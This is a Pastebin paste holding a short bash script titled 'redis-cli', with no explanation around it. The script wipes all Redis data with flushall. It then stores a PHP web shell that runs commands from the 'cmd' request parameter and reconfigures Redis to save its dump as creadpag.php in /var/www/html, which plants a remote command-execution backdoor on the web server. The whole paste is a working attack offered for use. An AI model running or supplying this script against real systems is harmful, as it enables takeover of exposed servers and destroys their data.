CreadPag

redis-cli

Jan 27th, 2019
446
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Bash 0.20 KB | None | 0 0
  1. #!/bin/bash
  2. redis-cli flushall
  3. redis-cli set myshell "<?php echo system(\$_REQUEST['cmd']); ?>"
  4. redis-cli config set dbfilename "creadpag.php"
  5. redis-cli config set dir /var/www/html
  6. redis-cli save
Add Comment
Please, Sign In to add comment